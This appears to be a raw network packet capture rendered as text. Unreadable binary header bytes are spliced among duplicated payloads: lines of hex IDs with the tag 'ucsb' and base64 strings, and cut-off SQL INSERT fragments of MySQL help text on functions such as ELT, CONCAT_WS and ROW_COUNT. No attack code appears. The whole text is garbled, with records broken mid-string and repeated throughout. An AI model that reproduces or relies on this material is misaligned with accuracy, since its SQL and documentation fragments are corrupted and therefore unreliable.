D19F3F9DB07046A03863FA2D2BAD83B3,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
D98724933D05791DE2160778E43470C2,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
8392EFC731BAC6ACF11E4D76D871BBCF,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
79122CB324A354E9417938B6DEC94751,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
2CDD780C2051A550B08030AC0330ED12,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
305C181046EEF53A269AC9756BC1EC92,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
EDBD01FEE7D469B60B9EBBB9E1BCE536,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
052B2CBCDB83F77A1FD12216D53F10F7,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
28944EECECDE349B71D75AA0A2D372A1,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
EBD937BF652124F62AEF1674FCD60D00,ucsb,MTNzEwEDAAeYkVLSJtkzCbb0`BiET@/o0AE< K@@  P2J? G ebE1954BD28FBD90BBF,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
85DA67F2F893FAFB31A35706554DD34A,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
C4B88BFB560E29A1D49BA3556B061004,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
6BC742CB0F068EEFCF8B9D65C187C472,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
510AFF95D6756040CE475028F24330F1,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
AB34C22487188D2842490C2777A71B8F,ucsb,MTNzEwEDAAeYkVLSJtkzbKD9Qz6vpvRfvptO8g==
D19F3F9DB07046A03863FA2D2BAD83B3,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
D98724933D05791DE2160778E43470C2,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
8392EFC731BAC6ACF11E4D76D871BBCF,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
79122CB324A354E9417938B6DEC94751,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
2CDD780C2051A550B08030AC0330ED12,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
305C181046EEF53A269AC9756BC1EC92,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
EDBD01FEE7D469B60B9EBBB9E1BCE536,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
052B2CBCDB83F77A1FD12216D53F10F7,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
28944EECECDE349B71D75AA0A2D372A1,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
EBD937BF652124F62AEF1674FCD60D00,ucsb,MTNzEwEDAAeYkVLSJtkzCkbbBi0`ET@/p܂Ao0E<@?x  3P@tj "  ){ DATABASE creates a database with the given name. To use\nCREATE DATABASE, you need the CREATE privilege on the database.\n','CREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n [create_specification [, create_specification] ...]\n\ncreate_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(120,'VAR_POP',12,' VAR_POP(expr)\nReturns the population standard variance of expr. It considers rows\nas the whole population, not as a sample, so it has the number of rows as\nthe denominator. This function was added in MySQL 5.0.3. Before 5.0.3, you\ncan use VARIANCE(), which is equivalent but not standard SQL.\n','',''),(121,'ELT',23,' ELT(N,str1,str2,str3,...)\nReturns str1 if N = 1, str2 if N =\n2, and so on. Returns NULL if N is less than 1\nor greater than the number of arguments. ELT() is the complement of\nFIELD().\n','mysql> SELECT ELT(1, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'ej\'\nmysql> SELECT ELT(4, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'foo\'',''),(122,'ALTER VIEW',24,'This statement changes the definition of an existing view.\nThe syntax is similar to that for CREATE VIEW.\nSee also : [CREATE VIEW, , CREATE VIEW].\nThis statement requires the CREATE VIEW and DELETE privileges\nfCbb0`BiET@/Ԁo0SE<@@w  3P@tj "  ){ DATABASE creates a database with the given name. To use\nCREATE DATABASE, you need the CREATE privilege on the database.\n','CREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n [create_specification [, create_specification] ...]\n\ncreate_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(120,'VAR_POP',12,' VAR_POP(expr)\nReturns the population standard variance of expr. It considers rows\nas the whole population, not as a sample, so it has the number of rows as\nthe denominator. This function was added in MySQL 5.0.3. Before 5.0.3, you\ncan use VARIANCE(), which is equivalent but not standard SQL.\n','',''),(121,'ELT',23,' ELT(N,str1,str2,str3,...)\nReturns str1 if N = 1, str2 if N =\n2, and so on. Returns NULL if N is less than 1\nor greater than the number of arguments. ELT() is the complement of\nFIELD().\n','mysql> SELECT ELT(1, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'ej\'\nmysql> SELECT ELT(4, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'foo\'',''),(122,'ALTER VIEW',24,'This statement changes the definition of an existing view.\nThe syntax is similar to that for CREATE VIEW.\nSee also : [CREATE VIEW, , CREATE VIEW].\nThis statement requires the CREATE VIEW and DELETE privileges\nfCbbBi0`ET@/,|po0E< L@?  P2R? p ebbKD9Qz6vpvRfvptO8g==
8F2839124F0843BB87A53DB7067B5ADF,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
637471C0BCD0AF60EADB546FB050FDDF,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
6E008616B3372F61431DD9932EDAE2F5,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
D955BF60F227C6B2A81BDF89B603D700,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
582B8219EE5FFC3BD3F02A868240B699,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
1796248AEF37A949116CA93025BB0D63,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
1ED2B4CA1EF059B54FBD5E0A06FE73A9,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
EE831F600B53F0BC0DB1130C4BA05F13,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
B7EA1F49BD1D325336D74351C65B36A8,ucsb,MTNzEwEDAAeYkVLSJtkzbKD9Qz6vpvRfvptO8g==
E36727FF6DBE46361BB29E3F47F37ED5,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
98C1EC7B86D63FC7E8036CEBF87D380E,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
3CD78808C1EF86D1937B9B9555876B7C,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
AAD8E28F9E06D1DF49851AC8201296ED,ucsb,MTNzEwEDAAtb4frjJmm+NS6wT/9gOh6inLcmmw==
695C0718DA678D94901D27F41A4D122C,ucsb,MTNzEwEDAAzj3cz3mDNQWFR7uajFiQJKlGetPg==
9206554A503266E775FA536884D5730E,ucsb,MTNzEwEDAA3eZNflLPWUcuK/wi7gzd9ZMd5JPQ==
C8329180EE769920E2Cbb0`BiET@/o0AE< L@@  P2R? p ebbKD9Qz6vpvRfvptO8g==
8F2839124F0843BB87A53DB7067B5ADF,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
637471C0BCD0AF60EADB546FB050FDDF,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
6E008616B3372F61431DD9932EDAE2F5,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
D955BF60F227C6B2A81BDF89B603D700,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
582B8219EE5FFC3BD3F02A868240B699,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
1796248AEF37A949116CA93025BB0D63,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
1ED2B4CA1EF059B54FBD5E0A06FE73A9,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
EE831F600B53F0BC0DB1130C4BA05F13,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
B7EA1F49BD1D325336D74351C65B36A8,ucsb,MTNzEwEDAAeYkVLSJtkzbKD9Qz6vpvRfvptO8g==
E36727FF6DBE46361BB29E3F47F37ED5,ucsb,MTNzEwEDAAiyxF7Kjz60YnT/Rr0+wL44DF5+Gg==
98C1EC7B86D63FC7E8036CEBF87D380E,ucsb,MTNzEwEDAAlUaAYWISHsrFOPEzby516zW7Ufog==
3CD78808C1EF86D1937B9B9555876B7C,ucsb,MTNzEwEDAApJdJ/Npaeys0FGjX0klevxOrWrZw==
AAD8E28F9E06D1DF49851AC8201296ED,ucsb,MTNzEwEDAAtb4frjJmm+NS6wT/9gOh6inLcmmw==
695C0718DA678D94901D27F41A4D122C,ucsb,MTNzEwEDAAzj3cz3mDNQWFR7uajFiQJKlGetPg==
9206554A503266E775FA536884D5730E,ucsb,MTNzEwEDAA3eZNflLPWUcuK/wi7gzd9ZMd5JPQ==
C8329180EE769920E2CebbBi0`ET@/,|po0E< M@?  P2Z? , eb8751EE982A2033,ucsb,MTNzEwEDAA5J5ooNrVoBkxG/W8OTECMPOd05Mg==
82BCBBC8143E77A83228594DAAC194E3,ucsb,MTNzEwEDAA8GpsrITZnl+9Jjx7aj4LZuWQNxWQ==
C42CC211D0745598C3920BA89F986AFD,ucsb,MTNzEwEDABCkBabEY+lJWtFUqFEQ3IwepboZxQ==
E17D198DDE90A06DE7436DD77BEA6032,ucsb,MTNzEwEDABE3DujGYVjA/3MpTBuiUQW050ypKA==
CE305D696B72B1962DFB99C99F883FB1,ucsb,MTNzEwEDABJU1NpIy8lOftIX21ms9OPOtMYv4g==
E0860256DC25B768B6ACD233E745017C,ucsb,MTNzEwEDABPC7DLXWMdRmspqafRMROj8CPZWoA==
0D921B295F71D02DA1D3F44EE55B94CD,ucsb,MTNzEwEDABRvQ1VWu9zPZ1YBlFErWnIgR9aQgA==
69C6C32A68B6C6224173DC53771B3C11,ucsb,MTNzEwEDABW3ckBJ0M5wSZuJ1BSfYRraOMToNw==
00376C7BB785D609D5025A0ED8249128,ucsb,MTNzEwEDABbSNcfBYg1Z5Gb0lN0BTTCe8RZ7qA==
F9BCE62C10D25D64CEFEF0C8160D91B1,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
ABF366D2433D20D64B30585FC84E2408,ucsb,MTNzEwEDABi7wyH/hM/NcWU+MkIHRk++CIpFGw==
D94943BAA7BA4BFEFE6DF1E8BA78608E,ucsb,MTNzEwEDABkXN6rFA7+obUwCykKP1/iEX27FmA==
4A0D4BDD32956780C8B71BE5AA9D2D97,ucsb,MTNzEwEDABqayREx95cmtSQ+tjUX7CPdcuVVgQ==
3C8364308FE7EA8C86D5E10FD6CDED74,ucsb,MTNzEwEDABvMmVkWeNjHdpfgSU2DQ30rlUhH5w==
15F7626B7E0667C7B4B16E744EAE0DE9,ucsb,MTNzEwEDABzIiMDMZFAA7Uhp5ieDWi7etdpTAg==
D5B959E452947251F2B7F2CF80455C11,ucsb,MTNzEwEDAB1xZ9+jWJVO792Cbb0`BiET@/o0AE< M@@  P2Z? , eb8751EE982A2033,ucsb,MTNzEwEDAA5J5ooNrVoBkxG/W8OTECMPOd05Mg==
82BCBBC8143E77A83228594DAAC194E3,ucsb,MTNzEwEDAA8GpsrITZnl+9Jjx7aj4LZuWQNxWQ==
C42CC211D0745598C3920BA89F986AFD,ucsb,MTNzEwEDABCkBabEY+lJWtFUqFEQ3IwepboZxQ==
E17D198DDE90A06DE7436DD77BEA6032,ucsb,MTNzEwEDABE3DujGYVjA/3MpTBuiUQW050ypKA==
CE305D696B72B1962DFB99C99F883FB1,ucsb,MTNzEwEDABJU1NpIy8lOftIX21ms9OPOtMYv4g==
E0860256DC25B768B6ACD233E745017C,ucsb,MTNzEwEDABPC7DLXWMdRmspqafRMROj8CPZWoA==
0D921B295F71D02DA1D3F44EE55B94CD,ucsb,MTNzEwEDABRvQ1VWu9zPZ1YBlFErWnIgR9aQgA==
69C6C32A68B6C6224173DC53771B3C11,ucsb,MTNzEwEDABW3ckBJ0M5wSZuJ1BSfYRraOMToNw==
00376C7BB785D609D5025A0ED8249128,ucsb,MTNzEwEDABbSNcfBYg1Z5Gb0lN0BTTCe8RZ7qA==
F9BCE62C10D25D64CEFEF0C8160D91B1,ucsb,MTNzEwEDABcuMY+9KXx1ecwQJ9YaYMOMMNmyBQ==
ABF366D2433D20D64B30585FC84E2408,ucsb,MTNzEwEDABi7wyH/hM/NcWU+MkIHRk++CIpFGw==
D94943BAA7BA4BFEFE6DF1E8BA78608E,ucsb,MTNzEwEDABkXN6rFA7+obUwCykKP1/iEX27FmA==
4A0D4BDD32956780C8B71BE5AA9D2D97,ucsb,MTNzEwEDABqayREx95cmtSQ+tjUX7CPdcuVVgQ==
3C8364308FE7EA8C86D5E10FD6CDED74,ucsb,MTNzEwEDABvMmVkWeNjHdpfgSU2DQ30rlUhH5w==
15F7626B7E0667C7B4B16E744EAE0DE9,ucsb,MTNzEwEDABzIiMDMZFAA7Uhp5ieDWi7etdpTAg==
D5B959E452947251F2B7F2CF80455C11,ucsb,MTNzEwEDAB1xZ9+jWJVO792C2bbBi0`ET@/,|po0E< N@?  P2b?  eeAbSToHe/8o4dUHQ==
DECE5C7480EC74E1B3D89034C8E42A1E,ucsb,MTNzEwEDAB4MunJOHC0bSsJ/hXOmTwclj4SZPw==
C42F2CFF0A0AA0ECA77575711C0F638F,ucsb,MTNzEwEDAB8MxLptoFxZWWLONviw7aiX8cTnuA==
6B97EEDBD5E643D834F6B60013472B2B,ucsb,MTNzEwEDACCQeRbhSSw7cjBy8DaFYfyeUuFTmw==
FE7EF505F5E06BA7F0AE4E5A00554D7C,ucsb,MTNzEwEDACHU/68AEPZtmlTIPKai8WWhdQ4dDg==
A9748150BBF1F5E0DE6FB654FA75C9B8,ucsb,MTNzEwEDACJZWz9Bb/2VN6d/FWfvpfmMmc2hpg==
DD4FEE798382DC73909E8588A45A2F35,ucsb,MTNzEwEDACPTDN3ubsCmiCOTpvRPKiXD53LhUw==
108D4B6FD974C1A1733E763EBB21AF45,ucsb,MTNzEwEDACRyNFHMPqwDfM1ZehXC7t8QIfKo7g==
9B0F8FE3708286DBF649078B40EF288A,ucsb,MTNzEwEDACXEFbhizVkHbqhcmj7Wuf6SmUi9Rw==
5FD6AF5B621C78FDD1D77D341D88CDD2,ucsb,MTNzEwEDACZMILK5KbsNDSaeu9eWT47uy/bTZA==
6BC5A17AE2F52233EFF69D58BCC5B229,ucsb,MTNzEwEDACfAM6/dL5lHKnuhxBoEZ4+6qIiz1g==
15DFB09999525DFD3A7F12B7592B7FDD,ucsb,MTNzEwEDACgs2NQpJui8dSK/sP6S9L5V0op5ow==
873A6CB5856D38CB0BED64C708078762,ucsb,MTNzEwEDACm3G75Jf06Rwg9EdBbsJU0A6668Vg==
71831C3469E1A64BC90F505FA0997681,ucsb,MTNzEwEDACoCFxBzmhcns1rKVY6GDVaU/Oq6YQ==
4E1404F77155B8B36D6FFC753AE8F5FB,ucsb,MTNzEwEDACtnJQSIZZBQAAN1sDtpb+XVhLEkbA==
21FCC2FD2C63314140C3E264FE4ACC49,ucsb,MTNzEwEDACzsPeixlqLkLCX/pMJT/xC9CFhwtw==
1464DA3F0B036E4D6F929CMbb0`BiET@/o0AE< N@@  P2b?  eeAbSToHe/8o4dUHQ==
DECE5C7480EC74E1B3D89034C8E42A1E,ucsb,MTNzEwEDAB4MunJOHC0bSsJ/hXOmTwclj4SZPw==
C42F2CFF0A0AA0ECA77575711C0F638F,ucsb,MTNzEwEDAB8MxLptoFxZWWLONviw7aiX8cTnuA==
6B97EEDBD5E643D834F6B60013472B2B,ucsb,MTNzEwEDACCQeRbhSSw7cjBy8DaFYfyeUuFTmw==
FE7EF505F5E06BA7F0AE4E5A00554D7C,ucsb,MTNzEwEDACHU/68AEPZtmlTIPKai8WWhdQ4dDg==
A9748150BBF1F5E0DE6FB654FA75C9B8,ucsb,MTNzEwEDACJZWz9Bb/2VN6d/FWfvpfmMmc2hpg==
DD4FEE798382DC73909E8588A45A2F35,ucsb,MTNzEwEDACPTDN3ubsCmiCOTpvRPKiXD53LhUw==
108D4B6FD974C1A1733E763EBB21AF45,ucsb,MTNzEwEDACRyNFHMPqwDfM1ZehXC7t8QIfKo7g==
9B0F8FE3708286DBF649078B40EF288A,ucsb,MTNzEwEDACXEFbhizVkHbqhcmj7Wuf6SmUi9Rw==
5FD6AF5B621C78FDD1D77D341D88CDD2,ucsb,MTNzEwEDACZMILK5KbsNDSaeu9eWT47uy/bTZA==
6BC5A17AE2F52233EFF69D58BCC5B229,ucsb,MTNzEwEDACfAM6/dL5lHKnuhxBoEZ4+6qIiz1g==
15DFB09999525DFD3A7F12B7592B7FDD,ucsb,MTNzEwEDACgs2NQpJui8dSK/sP6S9L5V0op5ow==
873A6CB5856D38CB0BED64C708078762,ucsb,MTNzEwEDACm3G75Jf06Rwg9EdBbsJU0A6668Vg==
71831C3469E1A64BC90F505FA0997681,ucsb,MTNzEwEDACoCFxBzmhcns1rKVY6GDVaU/Oq6YQ==
4E1404F77155B8B36D6FFC753AE8F5FB,ucsb,MTNzEwEDACtnJQSIZZBQAAN1sDtpb+XVhLEkbA==
21FCC2FD2C63314140C3E264FE4ACC49,ucsb,MTNzEwEDACzsPeixlqLkLCX/pMJT/xC9CFhwtw==
1464DA3F0B036E4D6F929CQbbBi0`ET@/,|po0E< O@?  P2j? U ee73B5D012C60,ucsb,MTNzEwEDAC0vdaQhs88l4EbVpuQZVoNA+e89iA==
FEF95C424BA995897ACF6B4ABB445F72,ucsb,MTNzEwEDADIRerItyD2CedbXY/osmrpUSSMwWg==
575723EDC9C9F33EEB55A61752395441,ucsb,MTNzEwEDADP4BNv7AA5KciCM/aD1eTxIt4Yciw==
D7AF980FF787DFCEA22C1F0425E2D8DB,ucsb,MTNzEwEDADR9V/UehNDB9ezohVsVYXcqp1g6ag==
EF3F226DEDB74BB08695F3DFF87892F9,ucsb,MTNzEwEDADW1oJrSJaLshfLnR6VCoRhn8FBpsA==
B2214F613588FA40E2751E43B281B6C0,ucsb,MTNzEwEDADZ/EvJ2PcDqW5uF3E3HPX7dvL64pw==
7269C875D985340D49A162CE61481979,ucsb,MTNzEwEDADfqiyfIw7QHWkDguxXDJpsnw/ovhg==
9784E9ED532AE798482B40123AB42D3F,ucsb,MTNzEwEDADjFRxScz77lQTzcA0smlgch20+Zjw==
8A971EA407553AD8EC860C632FF5DA67,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
0CBEF35425CB3B8F3E724B6A1869E65C,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
C126D97E2670F853577C4DD34AAF8F81,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
AB78AE70989A8CC32937CEB91E0C6934,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
5D9E714F56DCA7AFA161464B4B829E8A,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
C5C4009E3AEC7848521243BAA059B21E,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
C23708C05C0C10FA70BD0257FFA419BC,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
D4FBD2D1AA07BC23CD0ED4A1F8388D7C,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcCibb0`BiET@/o0AE< O@@  P2j? U ee73B5D012C60,ucsb,MTNzEwEDAC0vdaQhs88l4EbVpuQZVoNA+e89iA==
FEF95C424BA995897ACF6B4ABB445F72,ucsb,MTNzEwEDADIRerItyD2CedbXY/osmrpUSSMwWg==
575723EDC9C9F33EEB55A61752395441,ucsb,MTNzEwEDADP4BNv7AA5KciCM/aD1eTxIt4Yciw==
D7AF980FF787DFCEA22C1F0425E2D8DB,ucsb,MTNzEwEDADR9V/UehNDB9ezohVsVYXcqp1g6ag==
EF3F226DEDB74BB08695F3DFF87892F9,ucsb,MTNzEwEDADW1oJrSJaLshfLnR6VCoRhn8FBpsA==
B2214F613588FA40E2751E43B281B6C0,ucsb,MTNzEwEDADZ/EvJ2PcDqW5uF3E3HPX7dvL64pw==
7269C875D985340D49A162CE61481979,ucsb,MTNzEwEDADfqiyfIw7QHWkDguxXDJpsnw/ovhg==
9784E9ED532AE798482B40123AB42D3F,ucsb,MTNzEwEDADjFRxScz77lQTzcA0smlgch20+Zjw==
8A971EA407553AD8EC860C632FF5DA67,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
0CBEF35425CB3B8F3E724B6A1869E65C,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
C126D97E2670F853577C4DD34AAF8F81,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
AB78AE70989A8CC32937CEB91E0C6934,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
5D9E714F56DCA7AFA161464B4B829E8A,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
C5C4009E3AEC7848521243BAA059B21E,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
C23708C05C0C10FA70BD0257FFA419BC,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
D4FBD2D1AA07BC23CD0ED4A1F8388D7C,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcC-bbBi0`ET@/,|po0E< P@?  P2r?  eennuwGyMDehfA==
174C936F01FBB64F1FE4221C78BE10F3,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
C726151EEE318F2EAB7B8A0BE7C70B80,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
5EACEE9C108CDF7F88EDFBBE7283A739,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
3D5B7654AA982A1FCE20EBF3353B6E64,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
33ED63D009C8E981560A4F0FBD6D30A7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
662520E65D73701BA51EC53175C53018,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
584892446990287CD72708EA6C78E3A0,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
BFF163132E5393A721C61E4D2D78BCCC,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
806E6D6D8CEC6E3E94B3FB89621C845E,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3DDB16DAA679F0776ACB7CF6A73BBF06,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
55468338FE376513909CA00A66C615E8,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
770C4A1809AFA809028ECDD4E15EDC39,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
F7C0BF7CB0493A6D10E5B2D07FFCEEB7,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
5663A7193E1337A539AC56F6E3BB72EE,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6500EB407ED3721498E9CAC43EC5C8CC,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
98D5333693A4C882AF5CD515CHbb0`BiET@/o0AE< P@@  P2r?  eennuwGyMDehfA==
174C936F01FBB64F1FE4221C78BE10F3,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
C726151EEE318F2EAB7B8A0BE7C70B80,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
5EACEE9C108CDF7F88EDFBBE7283A739,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
3D5B7654AA982A1FCE20EBF3353B6E64,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
33ED63D009C8E981560A4F0FBD6D30A7,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
662520E65D73701BA51EC53175C53018,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
584892446990287CD72708EA6C78E3A0,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
BFF163132E5393A721C61E4D2D78BCCC,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
806E6D6D8CEC6E3E94B3FB89621C845E,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
3DDB16DAA679F0776ACB7CF6A73BBF06,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
55468338FE376513909CA00A66C615E8,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
770C4A1809AFA809028ECDD4E15EDC39,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
F7C0BF7CB0493A6D10E5B2D07FFCEEB7,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
5663A7193E1337A539AC56F6E3BB72EE,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
6500EB407ED3721498E9CAC43EC5C8CC,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
98D5333693A4C882AF5CD515C bbBi0`ET@/p܂Ao0E<@?x  3PEtj   ){or the view, and some privilege for each column referred to in the\nSELECT statement.\n','ALTER [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(123,'~',27,' ~\nInvert all bits.\n','mysql> SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'First name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API functC bb0`BiET@/Ԁo0SE<@@w  3PEtj   ){or the view, and some privilege for each column referred to in the\nSELECT statement.\n','ALTER [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(123,'~',27,' ~\nInvert all bits.\n','mysql> SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'First name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API functC%bbBi0`ET@/p܂Ao0E<@?x  3PJtj Ї  ){ion.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| 